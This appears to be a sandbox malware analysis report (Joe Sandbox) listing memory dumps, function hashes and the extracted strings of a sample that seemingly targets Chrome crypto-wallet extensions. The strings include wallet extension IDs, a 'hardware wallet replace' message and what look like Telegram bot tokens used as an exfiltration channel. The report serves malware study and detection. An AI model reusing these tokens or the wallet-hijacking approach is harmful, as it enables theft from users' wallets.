Associated: 00000003.00000002.1391394401.00000000011CD000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391413567.00000000011CE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391437813.00000000011D6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391458864.00000000011E2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391486372.00000000011FB000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391506310.0000000001201000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391526256.0000000001202000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391549522.0000000001206000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391567777.0000000001207000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391590106.000000000120B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391610638.000000000121A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391630415.000000000121E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391650653.000000000122B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391674296.000000000122F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391695977.0000000001230000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391716314.0000000001232000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391735889.0000000001233000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391755164.000000000123B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391779653.000000000124A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391800236.000000000124B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391800236.0000000001279000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391853854.00000000012A4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391875035.00000000012A5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391900756.00000000012A6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391921750.00000000012AA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391941571.00000000012AD000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391961642.00000000012BA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391980983.00000000012BB000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_fb0000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: 1dd820a232cfc1eb930d294eb10229599fa2e212d26b85d68f946ed46e0b0d04
Instruction ID: 420bc0094106f6425d01e83faf0054c0a379eae81fb13a044b5e20efbf18f86c
Opcode Fuzzy Hash: 1dd820a232cfc1eb930d294eb10229599fa2e212d26b85d68f946ed46e0b0d04
Instruction Fuzzy Hash: 36219E327002019BEB18AB6DDC89BECB7A1EBC1321F24421DE408DB6D4D77A5580EF52

Non-executed Functions

Function 00FB2EC0 Relevance: 7.8, APIs: 5, Instructions: 272COMMON

Download Yara Rule

APIs

__Mtx_unlock.LIBCPMT ref: 00FB2F5F
__Mtx_unlock.LIBCPMT ref: 00FB2FCC
__Cnd_broadcast.LIBCPMT ref: 00FB2FE3
__Mtx_unlock.LIBCPMT ref: 00FB30F5
__Mtx_unlock.LIBCPMT ref: 00FB319B

Memory Dump Source

Source File: 00000003.00000002.1390808577.0000000000FB1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000003.00000002.1390780269.0000000000FB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1390808577.0000000001012000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1390901310.0000000001019000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1390925797.000000000101B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1390951187.0000000001025000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1390983955.0000000001026000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391005427.0000000001027000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391172402.000000000117F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391199282.0000000001182000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391236924.0000000001192000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391236924.000000000119D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391292363.00000000011A5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391319218.00000000011A8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391344720.00000000011B2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391367124.00000000011B8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391394401.00000000011CD000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391413567.00000000011CE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391437813.00000000011D6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391458864.00000000011E2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391486372.00000000011FB000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391506310.0000000001201000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391526256.0000000001202000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391549522.0000000001206000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391567777.0000000001207000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391590106.000000000120B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391610638.000000000121A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391630415.000000000121E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391650653.000000000122B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391674296.000000000122F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391695977.0000000001230000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391716314.0000000001232000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391735889.0000000001233000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391755164.000000000123B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391779653.000000000124A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391800236.000000000124B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391800236.0000000001279000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391853854.00000000012A4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391875035.00000000012A5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391900756.00000000012A6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391921750.00000000012AA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391941571.00000000012AD000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391961642.00000000012BA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391980983.00000000012BB000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_fb0000_skotes.jbxd

Yara matches

Similarity

API ID: Mtx_unlock$Cnd_broadcast
String ID:
API String ID: 32384418-0
Opcode ID: c64b582584f1ba6f1b77191c70a155b5838d7e0e67f371d6fce0612362c8bbe2
Instruction ID: f5ee0a315b13735ce78b5442ae3d57aee6f27532b6768a99d802f446fa2a376d
Opcode Fuzzy Hash: c64b582584f1ba6f1b77191c70a155b5838d7e0e67f371d6fce0612362c8bbe2
Instruction Fuzzy Hash: 2BA1F371E41206AFDB10EF65CE45BAAB7A8FF14364F04812DE819D7241EB35EA04EBD1

Function 00FECBDF Relevance: 6.3, APIs: 4, Instructions: 320COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 00FECC66

Memory Dump Source

Source File: 00000003.00000002.1390808577.0000000000FB1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000003.00000002.1390780269.0000000000FB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1390808577.0000000001012000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1390901310.0000000001019000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1390925797.000000000101B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1390951187.0000000001025000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1390983955.0000000001026000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391005427.0000000001027000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391172402.000000000117F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391199282.0000000001182000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391236924.0000000001192000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391236924.000000000119D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391292363.00000000011A5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391319218.00000000011A8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391344720.00000000011B2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391367124.00000000011B8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391394401.00000000011CD000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391413567.00000000011CE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391437813.00000000011D6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391458864.00000000011E2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391486372.00000000011FB000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391506310.0000000001201000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391526256.0000000001202000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391549522.0000000001206000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391567777.0000000001207000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391590106.000000000120B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391610638.000000000121A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391630415.000000000121E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391650653.000000000122B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391674296.000000000122F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391695977.0000000001230000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391716314.0000000001232000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391735889.0000000001233000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391755164.000000000123B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391779653.000000000124A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391800236.000000000124B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391800236.0000000001279000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391853854.00000000012A4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391875035.00000000012A5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391900756.00000000012A6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391921750.00000000012AA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391941571.00000000012AD000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391961642.00000000012BA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391980983.00000000012BB000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_fb0000_skotes.jbxd

Yara matches

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: b6ef493d185ecd6e05961dbd11159ec72a600f70796096a8f2b5786dd78cba64
Instruction ID: dd05b4bd6bc9a135e851fbdd7a7336a55597385e22180c520d6f357ff6532f2f
Opcode Fuzzy Hash: b6ef493d185ecd6e05961dbd11159ec72a600f70796096a8f2b5786dd78cba64
Instruction Fuzzy Hash: 8FB1F232D042C59FDB25CF2AC881BBEBBA5EF45350F24416AF855EB241D6399D03DBA0

Function 00FCBB72 Relevance: 6.1, APIs: 4, Instructions: 80COMMON

Download Yara Rule

APIs

_xtime_get.LIBCPMT ref: 00FCBBCA
__Xtime_diff_to_millis2.LIBCPMT ref: 00FCBBE4
_xtime_get.LIBCPMT ref: 00FCBC07
__Xtime_diff_to_millis2.LIBCPMT ref: 00FCBC13

Memory Dump Source

Source File: 00000003.00000002.1390808577.0000000000FB1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000003.00000002.1390780269.0000000000FB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1390808577.0000000001012000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1390901310.0000000001019000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1390925797.000000000101B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1390951187.0000000001025000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1390983955.0000000001026000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391005427.0000000001027000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391172402.000000000117F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391199282.0000000001182000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391236924.0000000001192000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391236924.000000000119D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391292363.00000000011A5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391319218.00000000011A8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391344720.00000000011B2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391367124.00000000011B8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391394401.00000000011CD000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391413567.00000000011CE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391437813.00000000011D6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391458864.00000000011E2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391486372.00000000011FB000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391506310.0000000001201000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391526256.0000000001202000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391549522.0000000001206000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391567777.0000000001207000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391590106.000000000120B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391610638.000000000121A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391630415.000000000121E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391650653.000000000122B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391674296.000000000122F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391695977.0000000001230000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391716314.0000000001232000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391735889.0000000001233000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391755164.000000000123B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391779653.000000000124A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391800236.000000000124B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391800236.0000000001279000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391853854.00000000012A4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391875035.00000000012A5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391900756.00000000012A6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391921750.00000000012AA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391941571.00000000012AD000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391961642.00000000012BA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1391980983.00000000012BB000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_fb0000_skotes.jbxd

Yara matches

Similarity

API ID: Xtime_diff_to_millis2_xtime_get
String ID:
API String ID: 531285432-0
Opcode ID: b2d4ff15728042e7e75c12b8726096b043d64bbbd8d56fde7004660af079a0ed
Instruction ID: 632d9fab2a9d2fe0873d983d54fb034023beb8ec72c64e01e7aef8ded841783b
Opcode Fuzzy Hash: b2d4ff15728042e7e75c12b8726096b043d64bbbd8d56fde7004660af079a0ed
Instruction Fuzzy Hash: AF211D75E0011AAFDF01EBA4DE82EBEB7B9EF48710F11005DF505A7251DB399D01ABA1

Analysis Process: dwVrTdy.exePID: 8092, Parent PID: 7820COMMON

Execution Graph

Execution Coverage:	12.6%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	10.4%
Total number of Nodes:	2000
Total number of Limit Nodes:	37

Executed Functions

Function 00007FF643F383F0 Relevance: 232.4, APIs: 30, Strings: 101, Instructions: 3173networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF643F37970: K32EnumProcesses.KERNEL32(FFFFFFFF), ref: 00007FF643F379A3

GetConsoleWindow.KERNEL32(-00000027,?,?,?,00000006), ref: 00007FF643F384BE
ShowWindow.USER32(?,?,?,00000006), ref: 00007FF643F384C9
WSAStartup.WS2_32(?,?,?,00000006), ref: 00007FF643F384DB

Part of subcall function 00007FF643F3C660: _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F3C6D0

Part of subcall function 00007FF643F25D00: _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F25D58

Part of subcall function 00007FF643F3C660: _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F3C741

Part of subcall function 00007FF643F35EC0: GetModuleFileNameA.KERNEL32 ref: 00007FF643F35F4F
Part of subcall function 00007FF643F35EC0: GetLastError.KERNEL32 ref: 00007FF643F35F65
Part of subcall function 00007FF643F35EC0: GetLastError.KERNEL32 ref: 00007FF643F35FEA

Part of subcall function 00007FF643F25D60: CreateToolhelp32Snapshot.KERNEL32 ref: 00007FF643F25DA2

Part of subcall function 00007FF643F27C50: __std_fs_code_page.LIBCPMT ref: 00007FF643F27CEE
Part of subcall function 00007FF643F27C50: __std_fs_code_page.LIBCPMT ref: 00007FF643F27D7A

gethostname.WS2_32 ref: 00007FF643F3B54E
WSACleanup.WS2_32 ref: 00007FF643F3BE10
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F3C2F6
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F3C31F
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF643F3C325
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F3C32B
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F3C331
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F3C33D
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F3C343
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F3C35B
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F3C367
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F3C36D
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F3C373
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F3C379
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F3C37F
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F3C385
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F3C38B
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F3C391
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F3C397
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F3C39D
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F3C3A3
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F3C3A9
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F3C3AF
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F3C3B5
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F3C3BB
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F3C3C1
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F3C3C7

Part of subcall function 00007FF643F62A38: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF643F62A68
Part of subcall function 00007FF643F62A38: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF643F62A6E

Part of subcall function 00007FF643F35450: __std_fs_code_page.LIBCPMT ref: 00007FF643F354BA

Strings

C:\Program Files\Google\Chrome\Extensions\nkbihfbeogaeaoehlefnkodbefgpgknn, xrefs: 00007FF643F38A48
C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f, xrefs: 00007FF643F3B30B, 00007FF643F3B363
C:\Program Files\Google\Chrome\Extensions\mcohilncbfahbmgdjkbpemcciiolgcge, xrefs: 00007FF643F39CE1
C:\Program Files\Google\Chrome\Extensions\efbglgofoippbgcjepnhiblaibcnclgk, xrefs: 00007FF643F39710
There are no users. Exit, xrefs: 00007FF643F3C2FC
C:\Program Files\Google\Chrome\Extensions\bfnaelmomeimhlpmgjnjophhpkkoljpa, xrefs: 00007FF643F39438
\AppData\Local\Google\Chrome\User Data, xrefs: 00007FF643F3A8B7
23.12.21, xrefs: 00007FF643F38FA4
Process , xrefs: 00007FF643F38472
Directory don't exist , xrefs: 00007FF643F37DB2
exists, xrefs: 00007FF643F37E23
C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzip, xrefs: 00007FF643F3B377
C:\Program Files\Google\Chrome\Extensions\egjidjbpglichdcondbcbdnbeeppgdph, xrefs: 00007FF643F38770
api, xrefs: 00007FF643F3ACDD, 00007FF643F3ADD1
D304D4787A15629A04F596502ED8CF8C6031BF683EB7BCFDB1819D5F02C9667B, xrefs: 00007FF643F39D46
Graph, xrefs: 00007FF643F3B445
C:\Program Files\Google\Chrome\Extensions\fnjhmkhhmkbjkkabndcnnogagogbneec, xrefs: 00007FF643F39FC8
6442787215, xrefs: 00007FF643F3BD16
hardware wallet replace finished, xrefs: 00007FF643F3A77D
Failed to open file: , xrefs: 00007FF643F37EE0
13374995715847847, xrefs: 00007FF643F3891E
928279468E812A7C237289C39C5EA79668D93AE33F533F0C2198516C379764B7, xrefs: 00007FF643F3900B
All users: , xrefs: 00007FF643F3A606
D:\@dev\Extensions\Ronin (Extension), xrefs: 00007FF643F38D29
efbglgofoippbgcjepnhiblaibcnclgk, xrefs: 00007FF643F394CC
7340678156, xrefs: 00007FF643F3BCB2
Processing: , xrefs: 00007FF643F3AB06
remove_all, xrefs: 00007FF643F37E3A
aholpfdialjgjfhomihkjbmgjidlcdno, xrefs: 00007FF643F38DBD
CAC5B4D0F32AA7D73E8AF05E83A188D2ECBA2B6186D06E54306BC2427BBCD68C, xrefs: 00007FF643F392F5
13375110331747787, xrefs: 00007FF643F3915D, 00007FF643F3926B
C:\Users\, xrefs: 00007FF643F3A89D
Nothing found, xrefs: 00007FF643F3BDB2
C:\Program Files\Google\Chrome\Extensions\aholpfdialjgjfhomihkjbmgjidlcdno, xrefs: 00007FF643F38F5C
13375110354575865, xrefs: 00007FF643F39BAE, 00007FF643F39CBC
Failed to terminate , xrefs: 00007FF643F38489
hnfanknocfeofbddgcijnmhnfnkdnaad, xrefs: 00007FF643F3903A
C:\Program Files\Google\Chrome\Extensions\hnfanknocfeofbddgcijnmhnfnkdnaad, xrefs: 00007FF643F39290
128CF4C4A59C494144DAA119829B936CB9188E7B9DEFDBD4C0493780A8F822BE, xrefs: 00007FF643F38D8E
C:\Program Files\Google\Chrome\Extensions, xrefs: 00007FF643F3B4FB
C:\Program Files\Windows Media Player\graph, xrefs: 00007FF643F3B27F
AF7CBA694AB611FF172D667CA5504FEBFB024ABC1637F2C63B8D72D67BBA3F5A, xrefs: 00007FF643F3A02D
13374561731521706, xrefs: 00007FF643F38D04
7776586945:AAFQTT1AD04IUpOLlf1aziN70zm8frk2JnQ, xrefs: 00007FF643F3BC80
18750852BBA140FCF329F0B2F98ED961304CD00CFEE1A5FF44762B97F2CE9E2F, xrefs: 00007FF643F39A5F
fnjhmkhhmkbjkkabndcnnogagogbneec, xrefs: 00007FF643F39D72
hash, xrefs: 00007FF643F3AEBC
Failed to open output ZIP file: , xrefs: 00007FF643F381BD
<all_urls>, xrefs: 00007FF643F3859E, 00007FF643F386C8, 00007FF643F3887F, 00007FF643F389A0, 00007FF643F38B57, 00007FF643F38C78, 00007FF643F390B5, 00007FF643F391DF, 00007FF643F39547, 00007FF643F39668, 00007FF643F3981F, 00007FF643F39949, 00007FF643F39B06, 00007FF643F39C30, 00007FF643F39DED, 00007FF643F39F17
terminated successfully., xrefs: 00007FF643F3846B
graph.exe, xrefs: 00007FF643F38447
activeTab, xrefs: 00007FF643F38537, 00007FF643F38661, 00007FF643F38818, 00007FF643F38939, 00007FF643F38AF0, 00007FF643F38C11, 00007FF643F3904E, 00007FF643F39178, 00007FF643F394E0, 00007FF643F39601, 00007FF643F397B8, 00007FF643F398E2, 00007FF643F39A9F, 00007FF643F39BC9, 00007FF643F39D86, 00007FF643F39EB0
ios_base::badbit set, xrefs: 00007FF643F38336, 00007FF643F38395
805CF202E4DF8532D12BE509DE6794904E1C5D1F9FD783FD1507ADE27DEEE8AA, xrefs: 00007FF643F39775
13374559388926377, xrefs: 00007FF643F38BF6
ZIP Local File Header signature not found in file., xrefs: 00007FF643F3805E
Failed to initialize Winsock., xrefs: 00007FF643F384E5
7855878545:AAEEMUvgpX9jTAxlDd2gM_Sbv2jbI6-5_0o, xrefs: 00007FF643F3BD48
ios_base::failbit set, xrefs: 00007FF643F38341, 00007FF643F383A1
7427009775, xrefs: 00007FF643F3BD7A
found chrome profiles, xrefs: 00007FF643F3A812
No wallet installed previously..., xrefs: 00007FF643F3AA8D
Extraction complete., xrefs: 00007FF643F3B3A2
Location: , xrefs: 00007FF643F3B8C4
Failed to delete the directory., xrefs: 00007FF643F3B4C2
C:\Program Files\Windows Media Player\graph\graph.exe, xrefs: 00007FF643F3B24D, 00007FF643F3B459
13375110364515390, xrefs: 00007FF643F38A23
Extensions Installed, xrefs: 00007FF643F3B5E9
active_permissions, xrefs: 00007FF643F3ACC3, 00007FF643F3ADB7
13375110296496201, xrefs: 00007FF643F395E6, 00007FF643F396EB
mcohilncbfahbmgdjkbpemcciiolgcge, xrefs: 00007FF643F39A8E
IP Address: , xrefs: 00007FF643F3B6C5
13375110310591214, xrefs: 00007FF643F38646, 00007FF643F3874B
bfnaelmomeimhlpmgjnjophhpkkoljpa, xrefs: 00007FF643F39324
